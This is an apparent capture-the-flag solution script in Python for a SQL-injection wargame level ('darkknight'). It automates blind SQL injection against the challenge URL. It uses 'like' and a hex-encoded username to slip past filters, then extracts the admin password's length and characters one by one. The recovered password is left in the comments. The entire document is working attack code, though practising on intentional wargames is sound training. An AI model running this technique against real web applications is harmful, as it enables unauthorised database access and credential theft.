import requests
URL = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'Hello admin'
def query(payload):
params = {'no': payload}
cookies = {'PHPSESSID': PHPSESSID}
r = requests.get(URL, params=params, cookies=cookies)
content = r.text
return TRUE_PHRASE in content
# 8
def find_pw_length():
pw_len = 1
while query("0 or id like 0x61646d696e and length(pw) like {}".format(pw_len)) is False:
pw_len += 1
print('pw_len: {}'.format(pw_len))
return pw_len
# 0b70ea1f
def find_pw():
pw_len = find_pw_length()
pw = ''
for pos in range(1, pw_len + 1):
for character in range(0, 128):
if query("0 or id like 0x61646d696e and ord(mid(pw,{},1)) like {}".format(pos, character)) is True:
pw += chr(character)
break
print('pw: {}'.format(pw))
find_pw()